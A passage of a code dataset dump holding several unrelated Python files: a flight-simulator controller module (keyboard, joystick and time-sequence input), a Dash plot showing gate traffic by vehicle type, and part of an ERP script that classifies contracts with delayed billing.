logger.error(e)\n","repo_name":"django-hurricane/django-hurricane","sub_path":"hurricane/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"37"} +{"seq_id":"6405186876","text":"\"\"\"Classes defining controllers for simulated aircraft.\"\"\"\n\nimport pynput\nimport inputs\nimport copy\n\nimport numpy as np\nimport multiprocessing as mp\n\nfrom abc import abstractmethod\nfrom math import degrees, radians\n\nclass BaseController:\n \"\"\"An abstract aircraft controller class.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n\n # Initialize\n self._UI_inputs = {}\n self._keys_pressed = []\n self._input_dict = control_dict\n\n # Store flags\n self._data_flag = data_flag\n self._view_flag = view_flag\n self._quit_flag = quit_flag\n self._pause_flag = pause_flag\n\n # Set up user interface\n self._enable_interface = 
enable_interface\n if self._enable_interface:\n # Key press listener function\n def on_press(key):\n\n # Get key\n try:\n k = key.char\n except:\n k = key.name\n\n # Check action\n\n # Toggle flight data\n if k == 'i':\n self._data_flag.value = not self._data_flag.value\n\n # Toggle pause\n elif k == 'p':\n self._pause_flag.value = not self._pause_flag.value\n\n # Quit\n elif k == 'q':\n self._quit_flag.value = not self._quit_flag.value\n\n # Toggle view\n elif k == 'space':\n self._view_flag.value = (self._view_flag.value+1)%3\n\n # Store other keystroke\n elif k in ['w', 's', 'a', 'd', 'left', 'right', 'up', 'down']:\n self._keys_pressed.append(k)\n\n # Key release listener function\n def on_release(key):\n\n # Get key\n try:\n k = key.char\n except:\n k = key.name\n\n # Remove those from the list\n if k in ['w', 's', 'a', 'd', 'left', 'right', 'up', 'down'] and k in self._keys_pressed:\n self._keys_pressed = list(filter(lambda a: a != k, self._keys_pressed))\n\n # Initialize keyboard listener\n self._keyboard_listener = pynput.keyboard.Listener(on_press=on_press, on_release=on_release)\n self._keyboard_listener.start()\n\n # Get control names\n self._controls = []\n for key, value in self._input_dict.items():\n self._controls.append(key)\n self._num_controls = len(self._controls)\n\n # Initialize storage\n if control_output is not None:\n\n # Check for csv\n if \".csv\" not in control_output:\n raise IOError(\"Control output file must be .csv\")\n\n # Open file\n self._write_controls = True\n self._control_output = open(control_output, 'w')\n else:\n self._write_controls = False\n\n # Store mapping\n if control_output is not None or isinstance(self, TimeSequenceController):\n self._column_mapping = {}\n self._output_cols = [\"\"]*self._num_controls\n for key, value in self._input_dict.items():\n try:\n self._column_mapping[key] = value[\"column_index\"]\n self._output_cols[self._column_mapping[key]-1] = key\n except KeyError:\n if control_output is not None:\n raise IOError(\"'column_index' must be specified for each control if the controls are to be output.\")\n else:\n raise IOError(\"'column_index' must be specified for each control if a time-sequence controller is used.\")\n\n\n def finalize(self):\n if self._enable_interface:\n self._keyboard_listener.stop()\n if self._write_controls:\n self._control_output.close()\n if isinstance(self, JoystickController):\n self._joy_listener.kill()\n\n\n def get_control_names(self):\n \"\"\"Returns the names of the controls handled by this controller.\"\"\"\n return self._controls\n\n\n def get_input(self):\n \"\"\"Returns a dictionary of inputs from the user for controlling pause, view, etc.\"\"\"\n\n inputs = copy.deepcopy(self._UI_inputs)\n self._UI_inputs= {}\n return inputs\n\n\n def output_controls(self, t, control_dict):\n # Writes controls to csv\n if self._write_controls:\n line = [\"{0}\".format(t)]\n for i in range(self._num_controls):\n line.append(\",{0}\".format(control_dict[self._output_cols[i]]))\n line.append(\"\\n\")\n self._control_output.write(\"\".join(line))\n\n \n @abstractmethod\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"ABSTRACT METHOD. Returns the controls based on the inputted state.\n\n Parameters\n ----------\n t : float\n Time index in seconds.\n\n state_vec : list\n State vector of the aircraft being controlled. 
It is given in the form\n\n [u, v, w, p, q, r, x, y, z, e0, ex, ey, ez]\n\n where u, v, and w are the body-fixed velocity components, p, q, and r are\n the body-fixed angular velocity components, x, y, and z are the Earth-fixed\n position coordinates, and e0, ex, ey, and ez are the quaternion encoding\n a rotation from the local NED frame to the body-fixed frame.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n control_state : dict\n Updated control state.\n \"\"\"\n pass\n\n\n def get_limits(self):\n \"\"\"Returns the control limits for this controller.\"\"\"\n\n # This will only work if the limits are defined\n try:\n limits = {}\n for name in self._controls:\n \n # Get max deflections for angular controls\n if self._angular_control[name]:\n limits[name] = (-self._control_limits[name], self._control_limits[name])\n\n # Other controls just go between 0.0 and 1.0\n else:\n limits[name] = (0.0, 1.0)\n\n return limits\n\n except:\n return None\n\n\nclass NoController(BaseController):\n \"\"\"A controller that holds constant the initial controls.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n def get_control(self, t, state_vec, prev_controls):\n return prev_controls\n\n\nclass JoystickController(BaseController):\n \"\"\"A controller for controlling a 4-channel aircraft using a standard joystick.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n # Check for joystick\n self._avail_pads = inputs.devices.gamepads\n if len(self._avail_pads) == 0:\n raise RuntimeError(\"Couldn't find any joysticks!\")\n elif len(self._avail_pads) > 1:\n raise RuntimeError(\"More than one joystick detected!\")\n\n # Set off listener\n self._manager = mp.Manager()\n self._joy_def = self._manager.list()\n self._joy_def[:] = [0.0]*4\n self._throttle_perturbed = self._manager.Value('i', 0)\n self._trim_up_pressed = self._manager.Value('i', 0)\n self._trim_dn_pressed = self._manager.Value('i', 0)\n self._dn_cycles_held = 0\n self._up_cycles_held = 0\n self._trim_tab = 0.0\n self._joy_listener = mp.Process(target=joystick_listener, args=(self._joy_def, self._quit_flag, self._throttle_perturbed, self._trim_dn_pressed, self._trim_up_pressed))\n self._joy_listener.start()\n\n # Get mapping and limits\n self._axis_mapping = {}\n self._control_limits = {}\n self._angular_control = {} # True for angular deflection, False for 0 to 1.\n self._tied_to_trim_tab = {}\n for key, value in control_dict.items():\n\n # See if limits have been defined\n limits = value.get(\"max_deflection\", None)\n if limits is not None: # The limits are defined\n self._control_limits[key] = limits\n self._angular_control[key] = True\n else:\n self._angular_control[key] = False\n \n # Get the mapping\n self._axis_mapping[key] = value[\"input_axis\"]\n self._tied_to_trim_tab[key] = value.get(\"trim_tab\", False)\n\n # Set variable for knowing if the user has perturbed from the trim state yet\n self._perturbed_set = False\n self._perturbed = False\n 
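# Editor's note (added): the line below caches the joystick axes sampled at startup;\n # get_control() compares later samples of self._joy_def against this baseline to\n # detect the first deliberate pilot input (see self._perturbed).\n 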
self._joy_init = [0.0]*4\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state and keyboard/joystick inputs.\n\n Parameters\n ----------\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n controls : dict\n Dictionary of controls.\n \"\"\"\n\n # Set perturbation condition\n if not self._perturbed_set:\n self._joy_init[:] = self._joy_def[:]\n self._perturbed_set = True\n\n # Check if we're perturbed from the start control set\n if not self._perturbed:\n if (np.array(self._joy_def) != np.array(self._joy_init)).any():\n self._perturbed = True\n else:\n return prev_controls # No point in parsing things if nothing's changed\n\n # Update trim tab\n if self._trim_dn_pressed.value:\n self._dn_cycles_held += 1\n self._trim_tab -= 0.000005*self._dn_cycles_held\n else:\n self._dn_cycles_held = 0\n\n if self._trim_up_pressed.value:\n self._up_cycles_held += 1\n self._trim_tab += 0.000005*self._up_cycles_held\n else:\n self._up_cycles_held = 0\n\n # Parse new controls\n control_state = copy.deepcopy(prev_controls)\n for name in self._controls:\n if not self._throttle_perturbed.value and self._axis_mapping[name] == 3:\n continue\n elif self._angular_control[name]:\n setting = (self._joy_def[self._axis_mapping[name]]**3)*-self._control_limits[name]+self._tied_to_trim_tab[name]*self._trim_tab\n else:\n setting = (-self._joy_def[self._axis_mapping[name]]+1.)*0.5+self._tied_to_trim_tab[name]*self._trim_tab\n control_state[name] = setting\n\n return control_state\n\n\nclass KeyboardController(BaseController):\n \"\"\"A controller for controlling an aircraft with ailerons, elevators, and rudder, and a throttle using a standard keyboard.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n # Initialize user inputs\n self._UP = False\n self._DOWN = False\n self._RIGHT = False\n self._LEFT = False\n self._WW = False\n self._SS = False\n self._AA = False\n self._DD = False\n\n # Get mapping and limits\n self._axis_mapping = {}\n self._control_limits = {}\n self._angular_control = {} # True for angular deflection, False for 0 to 1.\n for key, value in control_dict.items():\n\n # See if limits have been defined\n limits = value.get(\"max_deflection\", None)\n if limits is not None: # The limits are defined\n self._control_limits[key] = limits\n self._angular_control[key] = True\n else:\n self._angular_control[key] = False\n \n # Get the mapping\n self._axis_mapping[key] = value[\"input_axis\"]\n \n # Store reverse mapping\n self._control_reverse_mapping = [0]*4\n for key, value in self._axis_mapping.items():\n self._control_reverse_mapping[value] = key\n\n # Store control names\n self._controls.append(key)\n\n # Set variable for knowing if the user has perturbed from the trim state yet\n self._perturbed = False\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state and keyboard/joystick inputs.\n\n Parameters\n ----------\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n\n Returns\n -------\n controls : dict\n Dictionary of controls.\n \"\"\"\n\n # Check 
for perturbation\n if not self._perturbed and len(self._keys_pressed) > 0:\n self._perturbed = True\n\n if self._perturbed:\n # Parse new controls\n control_state = {}\n for i in range(4):\n name = self._control_reverse_mapping[i]\n defl = 0.0\n\n # Get axis input\n if i == 0: # Input roll axis\n if 'left' in self._keys_pressed and not 'right' in self._keys_pressed:\n defl = 1.0\n elif not 'left' in self._keys_pressed and 'right' in self._keys_pressed:\n defl = -1.0\n\n elif i == 1: # Input pitch axis\n if 'up' in self._keys_pressed and not 'down' in self._keys_pressed:\n defl = 1.0\n elif not 'up' in self._keys_pressed and 'down' in self._keys_pressed:\n defl = -1.0\n\n elif i == 2: # Input yaw axis\n if 'a' in self._keys_pressed and not 'd' in self._keys_pressed:\n defl = 1.0\n elif not 'a' in self._keys_pressed and 'd' in self._keys_pressed:\n defl = -1.0\n\n else: # Input throttle axis\n if 'w' in self._keys_pressed and not 's' in self._keys_pressed:\n defl = 1.0\n elif not 'w' in self._keys_pressed and 's' in self._keys_pressed:\n defl = -1.0\n\n # Apply deflection\n if self._angular_control[name]:\n sensitivity = 0.01\n control_state[name] = min(self._control_limits[name], max(prev_controls[name]+sensitivity*defl, -self._control_limits[name]))\n else:\n sensitivity = 0.001\n control_state[name] = min(1.0, max(prev_controls[name]+defl*sensitivity, 0.0))\n\n else: # Otherwise, send back the previous controls\n control_state = copy.deepcopy(prev_controls)\n\n return control_state\n\n\nclass TimeSequenceController(BaseController):\n \"\"\"A controller for controlling an aircraft with ailerons, elevators, and rudder, and a throttle using a standard keyboard.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n self._input_dict = control_dict\n\n\n def read_control_file(self, control_file):\n \"\"\"Reads in a time sequence input file of control settings.\"\"\"\n\n # Read in file\n self._control_data = np.genfromtxt(control_file, delimiter=',')\n\n # Get final time\n self._t_end = np.max(self._control_data[:,0])\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state.\n\n Parameters\n ----------\n t : float\n Time index\n\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n \"\"\"\n\n # Get control\n control_state = {}\n for name in self._controls:\n i = self._column_mapping[name]\n default = prev_controls[name]\n control_state[name] = np.interp(t, self._control_data[:,0], self._control_data[:,i], left=default, right=default)\n\n # Check if we've reached the end\n if t > self._t_end:\n self._quit_flag.value = 1\n\n return control_state\n\n\ndef joystick_listener(axes_def, quit_flag, throttle_perturbed_flag, trim_dn_pressed, trim_up_pressed):\n \"\"\"Listens to the joystick input and posts latest values to the manager list.\"\"\"\n\n # While the game is still going\n while not quit_flag.value:\n\n # Wait for events\n events = inputs.get_gamepad()\n\n # Parse events\n try:\n for event in events:\n\n # Analog inputs\n if event.ev_type == 'Absolute':\n\n # Roll axis\n if event.code == 'ABS_X':\n axes_def[0] = event.state/511.5-1.0\n\n # Pitch axis\n elif event.code == 'ABS_Y':\n 
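# Editor's note (added, assumption): this stick appears to report 10-bit\n # values in [0, 1023]; dividing by 511.5 and subtracting 1.0 rescales the\n # reading onto roughly [-1.0, +1.0], like the roll axis above.\n 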
axes_def[1] = event.state/511.5-1.0\n\n # Yaw axis\n elif event.code == 'ABS_RZ':\n axes_def[2] = event.state/127.5-1.0\n\n # Throttle axis\n elif event.code == 'ABS_THROTTLE':\n if not throttle_perturbed_flag.value:\n throttle_perturbed_flag.value = 1\n axes_def[3] = event.state/127.5-1.0\n\n # Button inputs\n elif event.ev_type == \"Key\":\n\n # Increase trim\n if event.code == \"BTN_TOP2\":\n trim_up_pressed.value = not trim_up_pressed.value\n\n # Decrease trim\n elif event.code == \"BTN_THUMB2\":\n trim_dn_pressed.value = not trim_dn_pressed.value\n\n except BrokenPipeError:\n return\n\n except FileNotFoundError:\n return\n\n except ConnectionResetError:\n return\n\n return","repo_name":"2936691/Pylot","sub_path":"pylot/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":19051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"16723717434","text":"from data.MC1.data import get_data, filter_data\n\nfrom dash import dcc, html\nimport plotly.express as px\nimport pandas as pd\n\nclass Hover_plot(html.Div):\n def __init__(self, name):\n self.html_id = name.lower().replace(\" \", \"-\")\n \n # Equivalent to `html.Div([...])`\n super().__init__(\n className=\"graph_card\",\n children=[\n dcc.Graph(id=self.html_id)\n ],\n )\n\n self.df = get_data()\n self.locations = pd.read_parquet(\"data/MC1/locations.parquet\").sort_values(by=\"location\")\n\n def get_plot(self, point, month, car_type):\n \"\"\"\n This function updates the hover graph after hovering over a gate\n\n Parameters:\n ----------\n point (list): The coordinates of the gate that is hovered over\n month (list): The months that are selected\n car_type (str): The type of car that is selected\n\n Returns:\n -------\n fig (go.Figure()): The updated figure\n \"\"\"\n # Find which gate is being hovered on\n gate = \"\"\n for index, value in self.locations.iterrows():\n if value[\"coordinates\"][0] * 4 == point[0] and (200 - value[\"coordinates\"][1]) * 4 == point[1]:\n gate = value[\"location\"]\n \n\n # Filter on gate\n filtered_df = self.df.loc[self.df[\"gate-name\"] == gate]\n\n # Filter on month\n filtered_df = filter_data(filtered_df, [None, month])\n\n # Group on car type\n grouped_data = filtered_df.groupby(\"car-type\", as_index=False).count()\n\n # Rename column\n data_per_type = grouped_data.rename(columns={\"Timestamp\": \"count\"})\n \n # Compute total count\n total_count = data_per_type[\"count\"].sum()\n\n # Round the results to two decimals\n data_per_type[\"percentage\"] = round((data_per_type[\"count\"] / total_count) * 100, 2)\n\n # If a specific car type is selected\n if car_type != '0':\n # Select only those cars\n data_one_car = data_per_type.loc[data_per_type[\"car-type\"] == car_type]\n if data_one_car.empty:\n total_count = 0\n else:\n total_count = data_one_car[\"count\"].values[0]\n\n # Rename the values of car types\n data_per_type.replace({\"car-type\": {\"1\": \"Two-axle car\", \n \"2\": \"Two-axle truck\",\n \"2P\": \"Two-axle truck (Park service)\",\n \"3\": \"Three-axle truck\",\n \"4\": \"Four-axle (and above) truck\",\n \"5\": \"Two-axle bus\",\n \"6\": \"Three-axle bus\"}}, inplace=True)\n\n # Construct figure\n fig = px.bar(data_per_type, x=\"car-type\", y=\"percentage\", hover_data=[\"percentage\", \"count\"], \n width=400, height=400, title=\"Gate: \" + gate + \" | Total count: \" + str(total_count))\n\n return 
fig","repo_name":"MaartenVanSluijs/visual-analytics-dashboard","sub_path":"src/plots/hover_plot.py","file_name":"hover_plot.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44988843945","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom validacio_eines import lazyOOOP, daysAgo\nimport consolemsg\nfrom yamlns import namespace as ns\nimport xmlrpclib\nimport socket\nimport time\n\n# logging presets\nioModePresets = {\n 'debug': None,\n 'release': ['success', 'error', 'fail'],\n}\n\n\n# the proxy\nclass ProxyAllow:\n def __init__(self, object, allowed=None, default=None):\n self.object = object\n self.allowed = allowed\n self.default = default\n\n def __getattr__(self, name):\n if self.allowed is None or name in self.allowed:\n try:\n return getattr(self.object, name)\n except AttributeError:\n if self.default:\n return getattr(self.object, self.default)\n\n return getattr(self, 'idle')\n\n def idle(self, *args, **kwds):\n pass\n\n\n# helper functions\ndef hours(seconds):\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n if h > 0:\n return \"%d:%02d:%02d\" % (h, m, s)\n else:\n return \"%02d:%02d\" % (m, s)\n\n\n# the class\nclass Searcher:\n def __init__(self, limits=None, ioMode=None):\n self.limits_min = min(limits) if limits else None\n self.limits_max = max(limits) if limits else None\n self.broken_connection_wait = 3\n self.io = ProxyAllow(\n object=consolemsg,\n allowed=ioModePresets.get(ioMode, None),\n default='step')\n self.result = ns({})\n self.result.connectionErrors = 0\n self.template = \"output template, connection errors {connectionErrors}\"\n\n def run(self):\n self.setup()\n self.start = time.time()\n try:\n for key, counter in self.key_generator():\n if self.handbrake(counter):\n continue\n try:\n item_data = self.item_data_loader(key)\n caught = False\n for method in sorted(dir(self)):\n if (\n callable(getattr(self, method)) and\n method.startswith('test_')\n ):\n test_case_func = getattr(self, method)\n caught = test_case_func(counter, item_data)\n if caught:\n self.io.info(\n \"catched by {}, no more testing\",\n method)\n break\n if not caught:\n self.not_caught_by_tests(counter, item_data)\n except xmlrpclib.ProtocolError:\n self.io.error(\"Broken connection, nap time!\")\n self.result.connectionErrors += 1\n time.sleep(self.broken_connection_wait)\n except socket.error:\n self.io.error(\"Broken socket, nap time!\")\n self.result.connectionErrors += 1\n time.sleep(self.broken_connection_wait)\n self.io.bigstep(\"Done in {}\", self.get_elapsed_time())\n except KeyboardInterrupt:\n self.io.error(\"Pressed ctrl+C , exiting the main loop\")\n\n self.do_repport()\n\n def handbrake(self, v):\n if self.limits_min and v < self.limits_min:\n return True\n\n if self.limits_max and v > self.limits_max:\n return True\n\n return False\n\n def do_repport(self):\n self.io.info(\"Result data preparation\")\n for key in self.result.keys():\n len_key = 'len_'+key\n if len_key in self.template:\n self.result[len_key] = len(self.result[key])\n str_key = 'str_'+key\n if str_key in self.template:\n self.result[str_key] = \",\".join(self.result[key])\n name_key = 'names_'+key\n if name_key in self.template:\n self.result[name_key] = \",\".join(\n [str(i) for i in self.result[key]]\n )\n self.result[name_key] = \",\".join(\n [i.name for i in self.result[key]]\n )\n id_key = 'ids_'+key\n if id_key in self.template:\n self.result[id_key] = \",\".join(\n [str(i.id) for i in 
self.result[key]]\n )\n self.io.info(\"Result template instantiation\")\n self.io.success(self.template.format(**self.result))\n\n # Overridable functions\n def setup(self):\n self.io.bigstep(\"make the setup\")\n self.result['test'] = 'case'\n\n def key_generator(self):\n for counter, key in enumerate(range(0, 10)):\n self.io.bigstep(\"processing item {}\".format(key))\n yield key, counter + 1\n\n def item_data_loader(self, key):\n yield ns({'key': key})\n\n def not_caught_by_tests(self, counter, polissa):\n pass\n\n # Helper functions\n def get_elapsed_time(self):\n return hours(time.time() - self.start)\n\n def get_loop_times(self, partials, totals):\n elapsed = time.time() - self.start\n expected = (elapsed * totals) / partials\n remaining = expected - elapsed\n return (\n hours(elapsed),\n hours(remaining),\n hours(expected)\n )\n\n\n# Debugging constants\ntoday = None\noutputMode = 'release'\n\n\n# Helper functions\ndef today_minus(days):\n return daysAgo(days, date=today)\n\n\ndef date_minus(date, days=1):\n return daysAgo(days=days, date=date)\n\n\ndef date_plus(date, days=1):\n return daysAgo(days=(days*(-1)), date=date)\n\n\nclass SearchStrandedAndDelayed(Searcher):\n def __init__(self, limits=None):\n Searcher.__init__(self, limits, outputMode)\n self.result.last_polissa_created = None\n self.result.with_draft_invoices = []\n self.result.never_billed_no_meters = [] # overdue\n self.result.never_billed_stranded = []\n self.result.never_billed_distri_shame = [] # overdue\n self.result.billed_tchange_no_meters = [] # overdue\n self.result.billed_tchange_stranded = []\n self.result.billed_tchange_distri_shame = [] # overdue\n self.result.billed_but_no_invoces = []\n self.result.billed_no_meters = []\n self.result.billed_furder_stranded = []\n self.result.billed_furder_distri_shame = []\n self.result.late_billing = []\n self.template = \"\"\"\nRESUM DE L'SCRIPT:\n------------------\nAquest script classifica en diferents categories les polisses que estan a \\\nl'apartat de \"Contractes amb facturació endarrerida\" del ERP.\nLes polisses sortiran ordenades per data de l'última lectura facturada.\nSerà mes fiable si el passem despres d'haver obert factures al procés.\n\n * Polisses amb factures en esborrany: {len_with_draft_invoices}\n {names_with_draft_invoices}\n\n * Polisses que no han facturat mai:\n - Sense contadors : {len_never_billed_no_meters}\n {names_never_billed_no_meters}\n\n - Valorar si cal posar reclamació a distri: {len_never_billed_distri_shame}\n {names_never_billed_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_never_billed_stranded}\n {names_never_billed_stranded}\n\n * Polisses amb canvi de titular i no han facturat mai:\n - Sense contadors : {len_billed_tchange_no_meters}\n {names_billed_tchange_no_meters}\n\n - Valorar si cal posar reclamació a distri: \\\n{len_billed_tchange_distri_shame}\n {names_billed_tchange_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_billed_tchange_stranded}\n {names_billed_tchange_stranded}\n\n * Polisses que han facturat:\n - Sense factures : {len_billed_but_no_invoces}\n {names_billed_but_no_invoces}\n\n - Sense contadors : {len_billed_no_meters}\n {names_billed_no_meters}\n\n - Valorar si cal posar reclamació a distri: \\\n{len_billed_furder_distri_shame}\n {names_billed_furder_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_billed_furder_stranded}\n {names_billed_furder_stranded}\n\n * Polisses que no han entrat en les anteriors (endarrerides): 
\\\n{len_late_billing}\n {names_late_billing}\n\n Notes:\n Talls de connexió: {connectionErrors}\n Data creació última polissa : {last_polissa_created}\n El avuí es : {today}\n\"\"\"\n\n def setup(self):\n self.io.step(\"Connectant a l'erp\")\n self.Orm = lazyOOOP()\n self.io.success(\"Connectat\")\n self.pol_obj = self.Orm.GiscedataPolissa\n self.fact_obj = self.Orm.GiscedataFacturacioFactura\n self.pool_obj = self.Orm.GiscedataLecturesLecturaPool\n\n create_date = self.get_last_polissa_create_date()\n self.io.info(\"Última polissa creada a data : {}\", create_date)\n self.result.last_polissa_created = create_date\n self.result.today = today\n\n def key_generator(self):\n pol_ids = self.pol_obj.search(\n [('facturacio_endarrerida', '=', True)],\n order='data_ultima_lectura ASC, data_alta ASC') # Delayed only\n\n totals = len(pol_ids)\n\n for counter, pol_id in enumerate(pol_ids):\n item = counter + 1\n (elapsed, remaining, expected) = self.get_loop_times(item, totals)\n self.io.bigstep(\n \"{}/{} processing polissa id {} .. ( {} / {} / {} )\",\n item,\n totals,\n pol_id,\n elapsed,\n remaining,\n expected)\n yield pol_id, item\n\n def item_data_loader(self, key):\n return self.pol_obj.browse(key)\n\n def not_caught_by_tests(self, counter, polissa):\n self.result.late_billing.append(polissa)\n\n # Helper functions\n def get_last_polissa_create_date(self):\n last_pol_ids = self.pol_obj.search(\n [],\n order=\"create_date DESC\",\n limit=1)\n last_pols = self.pol_obj.perm_read(last_pol_ids)\n return last_pols[0]['create_date']\n\n def get_initial_pool_readings(self, polissa):\n for meter in polissa.comptadors:\n for measure in meter.pool_lectures:\n if (\n (measure.name == polissa.data_alta) or\n (measure.name == date_minus(polissa.data_alta))\n ):\n return measure.name\n return None\n\n def has_next_to_date_pool_readings(self, polissa, date_from):\n for meter in polissa.comptadors:\n for measure in meter.pool_lectures:\n if measure.name > date_from:\n return True\n return False\n\n def has_next_to_date_lect_readings(self, polissa, date_from):\n for meter in polissa.comptadors:\n for measure in meter.lectures:\n if measure.name > date_from:\n return True\n return False\n\n def get_last_customer_invoice(self, polissa):\n facts = self.fact_obj.search([\n ('polissa_id', '=', polissa.id),\n ('origin', '=', False),\n ('type', 'in', ['out_refund', 'out_invoice']),\n ], order='date_invoice DESC'\n )\n if not facts:\n return None\n return self.fact_obj.browse(facts[0])\n\n def has_draft_invoices(self, polissa):\n facts = self.fact_obj.search([\n ('polissa_id', '=', polissa.id),\n ('origin', '=', False),\n ('type', 'in', ['out_refund', 'out_invoice']),\n ('state', '=', 'draft'),\n ], order='date_invoice DESC'\n )\n return facts\n\n # testing contracts with draft invoices\n def test_1_contract_with_draft_invoices(self, counter, polissa):\n draft_invoices = self.has_draft_invoices(polissa)\n if draft_invoices:\n self.io.info(\n \"la polissa {} te {} factures en esborrany\",\n polissa.name,\n len(draft_invoices))\n self.result.with_draft_invoices.append(polissa)\n return True\n return False\n\n # testing the never billed contracts, case A in documentation\n def test_2_never_billed_contract(self, counter, polissa):\n if polissa.data_ultima_lectura:\n return False\n if polissa.facturacio_suspesa:\n return False\n if polissa.data_alta > today_minus(60):\n return False\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} no ha facturat mai i no te comptadors\",\n polissa.name)\n 
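# Editor's note (added): with no meters attached there are no readings to\n # bill, so the contract is bucketed as delayed (no-meters) rather than as\n # stranded, which would need manual action.\n 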
self.result.never_billed_no_meters.append(polissa)\n return True\n\n initial_pool_reading = self.get_initial_pool_readings(polissa)\n if initial_pool_reading:\n\n if self.has_next_to_date_pool_readings(polissa, polissa.data_alta):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.never_billed_stranded.append(polissa)\n return True\n else:\n if (\n polissa.facturacio_potencia != 'max' and\n not polissa.no_estimable\n ):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.never_billed_stranded.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} no ha facturat mai i culpa de distri\",\n polissa.name)\n self.result.never_billed_distri_shame.append(polissa)\n return True\n\n # testing the billed contracts with holder change, case A' in documentation\n def test_3_billed_contract_titular_change(self, counter, polissa):\n if not polissa.data_ultima_lectura:\n return False\n if polissa.data_ultima_lectura > polissa.data_alta:\n return False\n if polissa.facturacio_suspesa:\n return False\n\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} no ha facturat mai i no te comptadors\",\n polissa.name)\n self.result.billed_tchange_no_meters.append(polissa)\n return True\n\n initial_pool_reading = self.get_initial_pool_readings(polissa)\n if initial_pool_reading:\n\n if self.has_next_to_date_pool_readings(polissa, polissa.data_alta):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.billed_tchange_stranded.append(polissa)\n return True\n else:\n if (\n polissa.facturacio_potencia != 'max' and\n not polissa.no_estimable\n ):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.billed_tchange_stranded.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} no ha facturat mai i culpa de distri\",\n polissa.name)\n self.result.billed_tchange_distri_shame.append(polissa)\n return True\n\n # testing the billed contracts, case B in documentation\n def test_4_billed_contracts(self, counter, polissa):\n if not polissa.data_ultima_lectura:\n return False\n\n if polissa.data_ultima_lectura <= polissa.data_alta:\n return False\n\n last_inv = self.get_last_customer_invoice(polissa)\n if not last_inv:\n self.io.info(\n \"la polissa {} consta com a facturada pero no trobem cap \"\n \"factura!\",\n polissa.name)\n self.result.billed_but_no_invoces.append(polissa)\n return True\n\n if last_inv.date_invoice >= today_minus(35):\n return False\n\n if polissa.facturacio_suspesa:\n return False\n\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} ha facturat i no te comptadors\",\n polissa.name)\n self.result.billed_no_meters.append(polissa)\n return True\n\n has_further_pool_readings = self.has_next_to_date_pool_readings(\n polissa,\n polissa.data_ultima_lectura)\n if has_further_pool_readings:\n self.io.info(\n \"la polissa {} ha facturat i te lectures a pool despres de la\"\n \" última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n has_further_lect_readings = self.has_next_to_date_lect_readings(\n polissa,\n polissa.data_ultima_lectura)\n if has_further_lect_readings:\n self.io.info(\n \"la polissa {} ha facturat i te lectures a lectures despres de\"\n \"la última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n if not polissa.tarifa.name.startswith(\"2.\"):\n 
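# Editor's note (added, assumption): tariffs outside the 2.X family are\n # routed to the distributor-claim bucket below rather than being treated\n # as stranded contracts.\n 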
